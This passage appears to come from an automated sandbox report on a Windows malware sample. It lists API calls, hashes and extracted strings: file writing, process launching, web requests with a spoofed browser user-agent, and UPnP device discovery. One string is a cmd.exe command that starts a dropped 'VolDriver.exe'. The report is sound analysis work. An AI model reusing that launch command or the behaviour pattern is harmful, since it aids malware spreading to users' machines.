                                                                          • memcmp.NTDLL ref: 0040EB1D
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040EB4A
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EB54
                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
                                                                          • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                          • String ID:
                                                                          • API String ID: 3902698870-0
                                                                          • Opcode ID: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
                                                                          • Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
                                                                          • Opcode Fuzzy Hash: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
                                                                          • Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D516
                                                                          • GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D51D
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D528
                                                                          • SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D52F
                                                                          • InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
                                                                          • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
                                                                          • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
                                                                          • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
                                                                          • Sleep.KERNEL32(00000001), ref: 0040D61E
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D62D
                                                                          • SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                          • String ID:
                                                                          • API String ID: 3862671961-0
                                                                          • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
                                                                          • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040EBCE
                                                                          • memset.NTDLL ref: 0040EBDE
                                                                          • CreateProcessW.KERNEL32(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EC27
                                                                          • ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EC5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                          • String ID: $D$open
                                                                          • API String ID: 3787208655-2182757814
                                                                          • Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
                                                                          • Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                          • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                          • setsockopt.WS2_32 ref: 00401F2C
                                                                          • closesocket.WS2_32(?), ref: 00401F39
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 671207744-0
                                                                          • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
                                                                          • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040DB2E
                                                                          • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                          • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleeprecvfrom
                                                                          • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                          • API String ID: 668330359-3973262388
                                                                          • Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
                                                                          • Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
                                                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ECF8
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ED02
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040ED0D
                                                                          Strings
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                          • API String ID: 2743515581-2272513262
                                                                          • Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
                                                                          • Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
                                                                          • Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
                                                                          • Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
                                                                          • CreateFileW.KERNEL32(00417490,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B622
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040B62C
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                          • String ID:
                                                                          • API String ID: 439099756-0
                                                                          • Opcode ID: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
                                                                          • Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
                                                                          • Opcode Fuzzy Hash: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
                                                                          • Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
                                                                          • CreateFileW.KERNEL32(00416E70,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                          • String ID:
                                                                          • API String ID: 3956458805-0
                                                                          • Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
                                                                          • Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040D2E4,?), ref: 0040600F
                                                                          • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                          • CreateFileW.KERNEL32(00416E70,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                          • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                          • LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040D2E4,?), ref: 00406248
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                          • String ID:
                                                                          • API String ID: 1457358591-0
                                                                          • Opcode ID: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
                                                                          • Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
                                                                          • Opcode Fuzzy Hash: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
                                                                          • Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
                                                                          • Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
                                                                          • Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
                                                                          • Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
                                                                          • Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3168844106-0
                                                                          • Opcode ID: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
                                                                          • Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
                                                                          • Opcode Fuzzy Hash: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
                                                                          • Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                          • CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
                                                                          • wsprintfW.USER32 ref: 00406456
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstancewsprintf
                                                                          • String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                          • API String ID: 2038452267-1952734972
                                                                          • Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
                                                                          • Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
                                                                          • Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
                                                                          • Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                          • String ID: %s%s
                                                                          • API String ID: 1447977647-3252725368
                                                                          • Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
